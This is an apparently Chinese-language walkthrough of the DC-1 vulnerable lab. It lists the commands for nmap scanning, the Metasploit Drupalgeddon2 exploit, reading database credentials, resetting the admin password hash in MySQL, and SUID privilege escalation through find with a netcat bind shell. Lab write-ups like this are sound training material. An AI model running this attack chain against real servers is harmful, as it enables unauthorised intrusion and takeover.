靶机信息

DESCRIPTION
DC-1 is a purposely built vulnerable lab for the purpose of gaining experience in the world of penetration testing.

It was designed to be a challenge for beginners, but just how easy it is will depend on your skills and knowledge, and your ability to learn.

To successfully complete this challenge, you will require Linux skills, familiarity with the Linux command line and experience with basic penetration testing tools, such as the tools that can be found on Kali Linux, or Parrot Security OS.

There are multiple ways of gaining root, however, I have included some flags which contain clues for beginners.

There are five flags in total, but the ultimate goal is to find and read the flag in root's home directory. You don't even need to be root to do this, however, you will require root privileges.

Depending on your skill level, you may be able to skip finding most of these flags and go straight for root.

Beginners may encounter challenges that they have never come across previously, but a Google search should be all that is required to obtain the information required to complete this challenge.

TECHNICAL INFORMATION
DC-1 is a VirtualBox VM built on Debian 32 bit, so there should be no issues running it on most PCs.

While I haven't tested it within a VMware environment, it should also work.

It is currently configured for Bridged Networking, however, this can be changed to suit your requirements. Networking is configured for DHCP.

Installation is simple - download it, unzip it, and then import it into VirtualBox and away you go.

IMPORTANT
While there should be no problems using this VM, by downloading it, you accept full responsibility for any unintentional damage that this VM may cause.

In saying that, there shouldn't be any problems, but I feel the need to throw this out there just in case.

CONTACT
This is the first vulnerable lab challenge that I've created, so feel free to let me know what you think of it.

I can be contacted via Twitter - @DCAU7

信息收集

部署完靶机后扫描nmap获得ip地址,一个是kali的ip,另一个就是靶机的ip,之后再扫描主机的开放端口

#ping扫描网段内的主机
nmap -sP 10.0.0.0/24
#扫描主机端口
nmap -p 1-65535 10.0.0.17

QQ截图20210210110532.png

QQ截图20210210110814.png

有80端口可以尝试使用浏览器访问

QQ截图20210210110923.png

查看网站的robots.txt信息没有获得信息

QQ截图20210210111605.png

尝试使用dirb扫描网站目录没有获得信息

dirb http://10.0.0.17

QQ截图20210210111814.png

使用msfconsole获取shell

#搜索drupal相关漏洞
search drupal

QQ截图20210210111401.png

flag1

搜索到的漏洞都可以尝试利用,我这边直接利用exploit/unix/webapp/drupal_drupalgeddon2获取shell

use exploit/unix/webapp/drupal_drupalgeddon2
show options
#根据查看结果补全参数
set rhosts 10.0.0.17
run

QQ截图20210210112011.png

获得shell并反弹shell

shell
#进入交互式Shell
python -c 'import pty;pty.spawn("/bin/sh")'

cat flag1.txt

QQ截图20210210112709.png

flag2

根据flag1提示,可以通过其他搜索引擎方式获得配置文件的具体路径

head -30 ./sites/default/settings.php

QQ截图20210210115128.png

flag3

在配置文件中获得了明文的数据库账号和密码,登录数据库查看

mysql -h 127.0.0.1 -u dbuser -p
#密码: R0ck3t

登录数据库后查看users

show databases;
use drupaldb
show tables;
select * from users\G

QQ截图20210210121604.png

查询到2个用户,应该就算登录网站的用户,可以通过修改加密后的pass字段来重置密码登录网站

#在当前目录下执行脚本 获得加密后的密码 /var/www
./scripts/password-hash.sh 123456

password: 123456        hash: $S$DXC8UhJ4xjdgUrL841EYyfEx9AcHLmR8MJz/3ULMeGUqZJBdXnEd

#登录数据库修改密码
update drupaldb.users set pass='$S$DXC8UhJ4xjdgUrL841EYyfEx9AcHLmR8MJz/3ULMeGUqZJBdXnEd' where uid=1;

修改密码后登录网站

QQ截图20210210123004.png

登录后获得flag3

QQ截图20210210123205.png

QQ截图20210210123211.png

flag4

查看/etc/passwd文件,找到flag4

QQ截图20210210131448.png

flag5

最后利用了find命令suid提权

  • SUID是Linux的一种权限机制,具有这种权限的文件会在其执行时,使调用者暂时获得该文件拥有者的权限.如果拥有SUID权限,那么就可以利用系统中的二进制文件和工具来进行root提权.
#查找查找具有root权限的SUID的命令
find / -perm -4000 2>/dev/null

#利用find命令的漏洞提权
#find命令执行时拥有suid权限那么开启的shell也会继承这个权限
find ./ -exec "/bin/sh" \;

#也可以利用netcat获取root权限的shell到kali
find ./ -exec netcat -lvp 5555 -e /bin/sh \;
#kali执行命令
netcat 10.0.0.17 5555

QQ截图20210210134540.png